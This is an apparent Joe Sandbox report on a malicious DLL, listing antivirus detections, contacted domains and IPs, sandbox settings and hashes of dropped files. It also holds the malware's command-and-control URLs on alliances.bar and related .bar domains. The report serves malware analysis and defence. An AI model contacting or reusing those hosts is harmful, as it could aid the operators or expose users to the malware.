            33.2.rundll32.exe.4670000.2.unpack100%AviraHEUR/AGEN.1108168Download File
            6.2.rundll32.exe.4c00000.3.unpack100%AviraHEUR/AGEN.1108168Download File
            4.2.rundll32.exe.10000000.4.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
            29.2.rundll32.exe.5100000.2.unpack100%AviraHEUR/AGEN.1108168Download File
            4.2.rundll32.exe.4470000.2.unpack100%AviraHEUR/AGEN.1108168Download File
            0.2.loaddll32.exe.10000000.3.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
            36.2.rundll32.exe.4e90000.2.unpack100%AviraHEUR/AGEN.1108168Download File
            35.2.rundll32.exe.2b90000.2.unpack100%AviraHEUR/AGEN.1108168Download File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://alliances.bar/jdraw/EyekExaBW/AOmJRyo4fJFkPCi2jsPG/WyXo9UA7YyvHWkf5vtk/lKMztsIaB1HB9NTYYsSHgD/fQz2o9_2FQPif/0fDicM8g/8PZEF_2FfgYAg2gcvHBhP_2/FUzJr56vzj/WTbT4OEmvC2xapmxA/FYCvjWtA654H/XdKJrCOAQpA/_2BYDSsnxLQkRX/is5GUyU1jivaQMJ/C0L6SBH.crw0%Avira URL Cloudsafe
            http://alliancer.bar0%Avira URL Cloudsafe
            http://alliancer.bar/jdraw/IxaYG2PhzMHjwCX0WBwc/cmAvcstzmSKw031RJA_/2Fjblh6hTZRKkvCXX1cutr/m_2BxwDBu0%Avira URL Cloudsafe
            http://alliances.bar/jdraw/eKIdVq7xEW6JzcVSOG/YGAz0kRmP/C0f1b_2FRes_2FjY8B_2/B_2Fd5AfZVKD5X9IhDZ/d694TVwOFdByJwCY79yvmz/7R58NwfRecoLg/aA_2Bw0R/p0gM8vDZjy0ps_2BUIayQq9/Rn_2Bt_2F4/d1DmvYN0laOIuMrK4/gzoaehTV9xyU/Nf7ZEAISl2G/tYbkdP7D4szBeT/SRCKquNWp/kay.crw0%Avira URL Cloudsafe
            http://alliances.bar/jdraw/T3XNZT6zZjYD38/irugL9bm6bNKUFAIonM6H/wQL3HgmSBf4ywwYC/sCXsyThPbupkuWW/HhhD2tIgDuvCZc7SAr/u3tIlTv46/0VagixoIliZmOzrIJ8Gv/e15Bb16QLC3Qf1P6zSC/O1DjOyt740UVseH_2FPgwL/iVEyQ72HDAwgH/K2st7xyH/Ngp0jwDDrKGldAKNE1lGwr3/tPn1Qdvj/JvRqnbko7/r.crw0%Avira URL Cloudsafe
            http://allianceline.bar0%Avira URL Cloudsafe
            http://alliances.bar/jdraw/O3iaA2hu956AXTvBy/pROO_2Bezcv9/4EW_2BE2GiS/RrILj1FVsG0NgC/bEj1Md4FXMzXd_2BsQDkk/2E3fgPGlvmi62b6L/klQsJbFHAOHko_2/BUEsaqmse4HJAFyRlL/vhVfnT0FY/WbXAIRBRE8knIva7gP_2/FTNZLj1OD4sSLJ7_2B_/2BtcED7ctzJHZCgi_2FvX3/yhOQIkIeSXX6q/n.crw0%Avira URL Cloudsafe
            http://alliances.bar/jdraw/HxV_2Bo2vQql/kYmaS26P5Yr/1ei7o7GvahAXm7/WZ9ceXuO8s82IXd2qjhTi/gVDefd7ypFoQitu8/GJUghRHALUiqDy6/hHVuLE2xYoEYA04ng_/2Biq6MgyI/mSB_2FHBwC8tZQO2_2FQ/pZwzJOVW5TItjHxGvRf/VMVOqBmY6oS2fveNdw30jR/tGgzoqtgAAQGtKXKfjWMF/pw.crw0%Avira URL Cloudsafe
            http://alliances.bar/jdraw/0%Avira URL Cloudsafe
            http://allianceline.bar/jdraw/Gp9teWEG7kYAFsedbNc/UjTWH9ALqm6j8DrZlcMNvN/A7uHg_2BWB8_2/FmuvQjea/W3LR0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            contextual.media.net
            		23.211.6.95
            		truefalse
              		high
              alliancer.bar
              		162.255.119.245
              		truefalse
                		high
                dart.l.doubleclick.net
                		142.250.186.70
                		truefalse
                  		high
                  tls13.taboola.map.fastly.net
                  		151.101.1.44
                  		truefalse
                    		high
                    hblg.media.net
                    		23.211.6.95
                    		truefalse
                      		high
                      allianceline.bar
                      		162.255.119.73
                      		truefalse
                        		high
                        parkingpage.namecheap.com
                        		198.54.117.218
                        		truefalse
                          		high
                          lg3.media.net
                          		23.211.6.95
                          		truefalse
                            		high
                            btloader.com
                            		172.67.70.134
                            		truefalse
                              		high
                              geolocation.onetrust.com
                              		104.20.185.68
                              		truefalse
                                		high
                                ad-delivery.net
                                		172.67.69.19
                                		truefalse
                                  		high
                                  alliances.bar
                                  		195.110.59.2
                                  		truefalse
                                    		high
                                    www.msn.com
                                    		unknown
                                    		unknownfalse
                                      		high
                                      ad.doubleclick.net
                                      		unknown
                                      		unknownfalse
                                        		high
                                        srtb.msn.com
                                        		unknown
                                        		unknownfalse
                                          		high
                                          img.img-taboola.com
                                          		unknown
                                          		unknownfalse
                                            		high
                                            www.allianceline.bar
                                            		unknown
                                            		unknownfalse
                                              		high
                                              web.vortex.data.msn.com
                                              		unknown
                                              		unknownfalse
                                                		high
                                                www.alliancer.bar
                                                		unknown
                                                		unknownfalse
                                                  		high
                                                  cvision.media.net
                                                  		unknown
                                                  		unknownfalse
                                                    		high

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://alliances.bar/jdraw/EyekExaBW/AOmJRyo4fJFkPCi2jsPG/WyXo9UA7YyvHWkf5vtk/lKMztsIaB1HB9NTYYsSHgD/fQz2o9_2FQPif/0fDicM8g/8PZEF_2FfgYAg2gcvHBhP_2/FUzJr56vzj/WTbT4OEmvC2xapmxA/FYCvjWtA654H/XdKJrCOAQpA/_2BYDSsnxLQkRX/is5GUyU1jivaQMJ/C0L6SBH.crwtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://alliances.bar/jdraw/eKIdVq7xEW6JzcVSOG/YGAz0kRmP/C0f1b_2FRes_2FjY8B_2/B_2Fd5AfZVKD5X9IhDZ/d694TVwOFdByJwCY79yvmz/7R58NwfRecoLg/aA_2Bw0R/p0gM8vDZjy0ps_2BUIayQq9/Rn_2Bt_2F4/d1DmvYN0laOIuMrK4/gzoaehTV9xyU/Nf7ZEAISl2G/tYbkdP7D4szBeT/SRCKquNWp/kay.crwtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://alliances.bar/jdraw/T3XNZT6zZjYD38/irugL9bm6bNKUFAIonM6H/wQL3HgmSBf4ywwYC/sCXsyThPbupkuWW/HhhD2tIgDuvCZc7SAr/u3tIlTv46/0VagixoIliZmOzrIJ8Gv/e15Bb16QLC3Qf1P6zSC/O1DjOyt740UVseH_2FPgwL/iVEyQ72HDAwgH/K2st7xyH/Ngp0jwDDrKGldAKNE1lGwr3/tPn1Qdvj/JvRqnbko7/r.crwtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://alliances.bar/jdraw/O3iaA2hu956AXTvBy/pROO_2Bezcv9/4EW_2BE2GiS/RrILj1FVsG0NgC/bEj1Md4FXMzXd_2BsQDkk/2E3fgPGlvmi62b6L/klQsJbFHAOHko_2/BUEsaqmse4HJAFyRlL/vhVfnT0FY/WbXAIRBRE8knIva7gP_2/FTNZLj1OD4sSLJ7_2B_/2BtcED7ctzJHZCgi_2FvX3/yhOQIkIeSXX6q/n.crwtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://alliances.bar/jdraw/HxV_2Bo2vQql/kYmaS26P5Yr/1ei7o7GvahAXm7/WZ9ceXuO8s82IXd2qjhTi/gVDefd7ypFoQitu8/GJUghRHALUiqDy6/hHVuLE2xYoEYA04ng_/2Biq6MgyI/mSB_2FHBwC8tZQO2_2FQ/pZwzJOVW5TItjHxGvRf/VMVOqBmY6oS2fveNdw30jR/tGgzoqtgAAQGtKXKfjWMF/pw.crwtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    http://alliancer.barrundll32.exe, 00000004.00000002.485605152.0000000002BA1000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://alliancer.bar/jdraw/IxaYG2PhzMHjwCX0WBwc/cmAvcstzmSKw031RJA_/2Fjblh6hTZRKkvCXX1cutr/m_2BxwDBurundll32.exe, 00000004.00000002.484637438.0000000002B4B000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://allianceline.barrundll32.exe, 00000004.00000003.470024227.0000000002BA1000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://alliances.bar/jdraw/rundll32.exe, 00000004.00000002.484637438.0000000002B4B000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://allianceline.bar/jdraw/Gp9teWEG7kYAFsedbNc/UjTWH9ALqm6j8DrZlcMNvN/A7uHg_2BWB8_2/FmuvQjea/W3LRrundll32.exe, 00000004.00000003.421876543.0000000002BA1000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown

                                                    Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    195.110.59.2
                                                    		alliances.barLithuania
                                                    		47583AS-HOSTINGERLTfalse
                                                    172.67.69.19
                                                    		ad-delivery.netUnited States
                                                    		13335CLOUDFLARENETUSfalse
                                                    151.101.1.44
                                                    		tls13.taboola.map.fastly.netUnited States
                                                    		54113FASTLYUSfalse
                                                    104.20.185.68
                                                    		geolocation.onetrust.comUnited States
                                                    		13335CLOUDFLARENETUSfalse
                                                    172.67.70.134
                                                    		btloader.comUnited States
                                                    		13335CLOUDFLARENETUSfalse
                                                    142.250.186.70
                                                    		dart.l.doubleclick.netUnited States
                                                    		15169GOOGLEUSfalse

                                                    General Information

                                                    Joe Sandbox Version:33.0.0 White Diamond
                                                    Analysis ID:454630
                                                    Start date:27.07.2021
                                                    Start time:10:54:47
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 14m 46s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Sample file name:direction.dll
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:50
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal76.troj.winDLL@72/174@25/6
                                                    EGA Information:Failed
                                                    HDC Information:
                                                    • Successful, ratio: 87.7% (good quality ratio 83.1%)
                                                    • Quality average: 79%
                                                    • Quality standard deviation: 29.2%
                                                    HCA Information:
                                                    • Successful, ratio: 94%
                                                    • Number of executed functions: 146
                                                    • Number of non-executed functions: 259
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .dll
                                                    Warnings:
                                                    Show All
                                                    • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 13.88.21.125, 13.64.90.137, 104.43.139.144, 23.203.80.193, 131.253.33.203, 131.253.33.200, 13.107.22.200, 80.67.82.209, 80.67.82.240, 65.55.44.109, 23.211.6.95, 13.107.40.203, 23.211.4.86, 152.199.19.161, 20.82.210.154, 93.184.221.240, 80.67.82.235, 80.67.82.211, 40.112.88.60
                                                    • Excluded domains from analysis (whitelisted): signin.microsoft.com, a-0003.fbs2-a-msedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a-0003.dc-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, ie9comview.vo.msecnd.net, wu.ec.azureedge.net, cvision.media.net.edgekey.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, www-msn-com.a-0003.a-msedge.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, e607.d.akamaiedge.net, web.vortex.data.microsoft.com, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, icePrime.a-0003.dc-msedge.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, skypedataprdcolwus15.cloudapp.net, cs9.wpc.v0cdn.net
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    10:55:58API Interceptor1x Sleep call for process: regsvr32.exe modified
                                                    10:56:10API Interceptor5x Sleep call for process: rundll32.exe modified
                                                    10:57:17API Interceptor1x Sleep call for process: loaddll32.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    No context

                                                    Domains

                                                    No context

                                                    ASN

                                                    No context

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\1JYDDI8A\www.msn[1].xml
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):152
                                                    Entropy (8bit):5.157520317739895
                                                    Encrypted:false
                                                    SSDEEP:3:D90aK1ryRtFwsx6wmxvFuqLHIfwEYPJGX7T40AAeDTWXhM9qSdVHWLKb:JFK1rUFkduqswEkIXH40AAeD2hMldDb
                                                    MD5:3DB8715CF690A8043A4F760B569F9C0F
                                                    SHA1:C22FA80A559AFE985D825E43242604D6463287B0
                                                    SHA-256:7F7EFD5CC51C6A86435F6DD7EA3FD7094865390202A01E2CEB6A179786E71109
                                                    SHA-512:8DDD916B09BC07073E88CED33C308A94369E4D8EFD17361B61CB06097BC9D6746914B80C5EFD356D3B0A85CD6F05364B9C1550A18E0FCE7C52A8564CE3178809
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: <root></root><root><item name="BT_AA_DETECTION" value="{&quot;ab&quot;:false,&quot;acceptable&quot;:true}" ltime="2720955632" htime="30901008" /></root>
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\580K31Y9\contextual.media[1].xml
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):2008
                                                    Entropy (8bit):4.879538883267568
                                                    Encrypted:false
                                                    SSDEEP:48:06s6s6Rs6s6Ds6s6ts6sLsLsLsLsLsL8sLsLicDg1DoBY:3ffRffDfftfuuuuuu8uuicDg1DSY
                                                    MD5:D1EED8717EBBB04B4D6AF409CE64CE46
                                                    SHA1:4D2D9FCBCE39DEC7B5EA9B7DF424F2A9EE6087B8
                                                    SHA-256:C1C6FBD73F355664905AF421204A291819B40593183F6735B94425B577A71044
                                                    SHA-512:52D3D92B2F39041C2686184BCEC400297D0B5F26B25FA0085644AB5B42FB0FA23C1B23EB94F0206D50982A9ADDC18CF72191421AB47CAD90133C2A70EC4B52D3
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: <root></root><root></root><root><item name="HBCM_BIDS" value="{}" ltime="2678625632" htime="30901008" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2678625632" htime="30901008" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2678625632" htime="30901008" /><item name="mntest" value="mntest" ltime="2678625632" htime="30901008" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2678625632" htime="30901008" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2678625632" htime="30901008" /><item name="mntest" value="mntest" ltime="2679105632" htime="30901008" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2678625632" htime="30901008" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2678625632" htime="30901008" /><item name="mntest" value="mntest" ltime="2682105632" htime="30901008" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2678625632" htime="30901008" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2688915632" htime="30901008"
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{D924C228-EF03-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):477688
                                                    Entropy (8bit):2.7157383836456748
                                                    Encrypted:false
                                                    SSDEEP:384:raTnVSbTrPA2/5fy51a8H/xuaoNpWehKpC2T2zsUHPz0u7nFw8RXn8vWTCYgC7LX:6c
                                                    MD5:AD1AB0DF58CBB86C99FE852B7183BBE1
                                                    SHA1:9FA011319D99E3CF886117FAB8A37D1A8C054009
                                                    SHA-256:0487B0DC490DA99C3AA520CDF9F0754BF3B09EA908BDB6E66F3C04044790A216
                                                    SHA-512:A0B6049BB25467C8F611D25026AA3248F00A947AF1967CA5735AFFA22420AB53FA08A4EA018483DCE27D12CC5CEA4B4C3DECB2F4A1CB2571A8AA13A83C2CADD1
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{04CD2A19-EF04-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):27364
                                                    Entropy (8bit):1.845521788599599
                                                    Encrypted:false
                                                    SSDEEP:96:r2ZBQp6rBSmjx29WCMeGTIdLr/qqDRTIdLr/qrIKpA:r2ZBQp6rkmjx29WCMeGe/qqDRe/qZpA
                                                    MD5:53F1EF23F02F0531551DB52A3E41741E
                                                    SHA1:6831E7E1CB848744162C86E768B8DD02132184FF
                                                    SHA-256:F374193A613ADA43596947F7AA774F6059184A3873663F06D7215FFF4FCDF080
                                                    SHA-512:87EBAC23329052C7E0C507B674EC4F6373386304747FDFC44B5BD481A132BF4F6537DE0FC184B93012C256816B68DCD4F4A1157DB3499D7DC2C5F095B54853A2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{04CD2A1B-EF04-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):27376
                                                    Entropy (8bit):1.849348397296045
                                                    Encrypted:false
                                                    SSDEEP:48:IwCGcprvGwpa3G4pQXGrapbS1GQpBbniBGHHpcbY2TGUp8b0GzYpmbEfGopo5EUF:r2ZZQ56rBS/j92xW0Mg6J1AxJ111kmA
                                                    MD5:1BA41480D7927E5749AE9C94EDD0C908
                                                    SHA1:F5B2692576257891FA3D0A8C29DEB4E38F216C3F
                                                    SHA-256:6DE0F09AAFA98D3558F5F0C21C78E17E3E1200A91779DCD9C96DB89B70054547
                                                    SHA-512:685D226FC3E7CCD74AF80F9A8CAF295A86E44FADFAC26B0CDD63EAC7F9E226429CC576EBEC024D4C3A8D8310BCF00BCE6A79A8B2E9E0A37584BF76DF5375239F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{10C754F2-EF04-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):27388
                                                    Entropy (8bit):1.8485923221388139
                                                    Encrypted:false
                                                    SSDEEP:192:rKZhQ+6Ekdjl21WpMtOP8g0YORP8g0YwA:r22Jp5cMy07G7X
                                                    MD5:EB7141757F0E20C227CE855544609F43
                                                    SHA1:956B17D5418704E02349F30664D5092F054811F6
                                                    SHA-256:1C150BC2D3BBDEE9969760851F3A0184D91E02CC3CD5FD96A417811DD706F9FD
                                                    SHA-512:14785A1787CF8B4A80A8552922729677B4A80C1C4693A573A9683719F3C3F5E086C7784066B4D4005A36733051BEE694802015FCEBC1A1A1E6504C83AA0B391B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{10C754F3-EF04-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):27864
                                                    Entropy (8bit):1.825177741662783
                                                    Encrypted:false
                                                    SSDEEP:192:rBZiQT6xkdjt2NW5M9S1VS1t4R1VS1t6VIr:rHP2i5kkCI1g41gCq
                                                    MD5:7F23F390BAFB3FE329F987B3FAFBA1FE
                                                    SHA1:57C004896B8161306FE39CB1DF3B0B05C7F17DF1
                                                    SHA-256:5B6CA068D8CE7C6A9B2BDBDDC10473043388B51262FE7F092B055CBD72A06C83
                                                    SHA-512:BB2AAB382F720F16D7014EC8C9554BC2783C24CE6A68934258457578ADFEA2A47D72D5D15C6DEFA4E769A0F80A438B74A17F4F589E88E8DCEC4EB8C0CE936F3F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{10C754F5-EF04-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):27924
                                                    Entropy (8bit):1.8481559818243574
                                                    Encrypted:false
                                                    SSDEEP:96:r9ZWQe6kBSljh2NWsMA2rQgHnxrQgHvEcr:r9ZWQe6kkljh2NWsMA2rQQxrQQxr
                                                    MD5:ABA9742B92A78CF668FE77D662B35887
                                                    SHA1:9922A8EFCE6CC4A861E4A7672C73A83FACBBC209
                                                    SHA-256:1AB9A317C17BBB3AD6177132B7CE522DF7848953362C12AA59C1CE293F6D9331
                                                    SHA-512:CFEEF3E3C525F7BF1FD7BF27DD629378517708955545CC78AD7C295BBF8203AD3A52A0979B8224EDC52AED86FAF88969D7A63EF4C7C87C4F0B8243002E4824A2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{1BBD99C1-EF04-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):24616
                                                    Entropy (8bit):1.7250471470155058
                                                    Encrypted:false
                                                    SSDEEP:48:IwRGcprwGwpa8G4pQQGrapbSPGQpBlgGHHpcXTGUp84GzYpm+ZGopAYSNj+7XOxH:rnZYQc6uBSZj92hWcMQiRa7XOxIxdlg
                                                    MD5:0C6463AE08972344FE51DB72A70E7820
                                                    SHA1:6971407FA7AC2B6FB59BBE35DFAF193BC7D6DAE6
                                                    SHA-256:A3548897535903DFEF10F1FAE9D1ACEEE80F8324AE3A297C717C8F34640CD963
                                                    SHA-512:4C994B772228787D75F6CD9898E327B10DF95BDBCBF8CFF3E870253F8196BD805F817BCA9E46BCB589223AC60A9213C300588C0B0AABB73C3F06CB39E300BBE9
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{1BBD99C3-EF04-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):27372
                                                    Entropy (8bit):1.8473737929923448
                                                    Encrypted:false
                                                    SSDEEP:48:IwLBGcprRaGwpaNG4pQ5GrapbSiGQpBlgGHHpcXTGUp8dUGzYpm+3vGopcYSYOuK:rrZEQv6ZBSqj92hWdQMip+ddtxdd4dBA
                                                    MD5:C78242418B3A91ED239A6F0048F3EB5C
                                                    SHA1:533683FAF6E3ECF527CC1C84B87C5A4DB5B8D03F
                                                    SHA-256:99833478B8796F78899FDA58F677B540629AE6847F4B786C0EC1C50C79753697
                                                    SHA-512:48FB8F1AC0B2ACEFE26F04CC15589846585CE3EDAB5880A5ADBE1FE24ED9BF10F33273F7272B5A647C9960B4F4ABBB6DABE0D3CE5F194B0C0D2BBABB0176BE5C
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{1BBD99C4-EF04-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):16984
                                                    Entropy (8bit):1.5622410161039688
                                                    Encrypted:false
                                                    SSDEEP:48:IwAGcprBGwpaIG4pQEGrapbS3GQpKvG7HpRATGIpG:rkZbQY6SBSBA+TUA
                                                    MD5:B5FCB62C18392FE8B389A156793D0822
                                                    SHA1:FE51F73B2C3CF9B8EFDBB35FF81B71FCF5B12DF3
                                                    SHA-256:B696FE0AF425946D3D4A4C5281BABAAB19FC9C6ABEFAD996BB05C3967E842C06
                                                    SHA-512:4B7077260E453E7BA79225141FFFB7123534EB4F47CBA87DD064A0997F3B95DEED1E965BC95A1DC44F0730C1E0D634E4906DC4B718862CEF935FB59C2BF577BC
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{1BBD99C6-EF04-11EB-90E4-ECF4BB862DED}.dat
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:Microsoft Word Document
                                                    Category:dropped
                                                    Size (bytes):27924
                                                    Entropy (8bit):1.8485409271540891
                                                    Encrypted:false
                                                    SSDEEP:96:r1ZiQS6UBSpjFn2VWUMY2IPEG6xIPEGScr:r1ZiQS6Ukpjt2VWUMY2jG6xjGfr
                                                    MD5:C201D9635218DFF0FF8E3AB903330AE8
                                                    SHA1:CE7568D398BCE346FBB91852E2CBA98170C650FA
                                                    SHA-256:AD1B156E98B4391D0139F2705F2CF279F080023E7CE847A2F5C62131CAFCA70A
                                                    SHA-512:BDF5AD0EAE05B9DBE7358AA415E1B640ED8691C8FFB910ACBE376AC4E2864F72B85CFE768B55C1C904787A1C88B658DF2C09797C60D0CC0083F0ED439187EE05
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
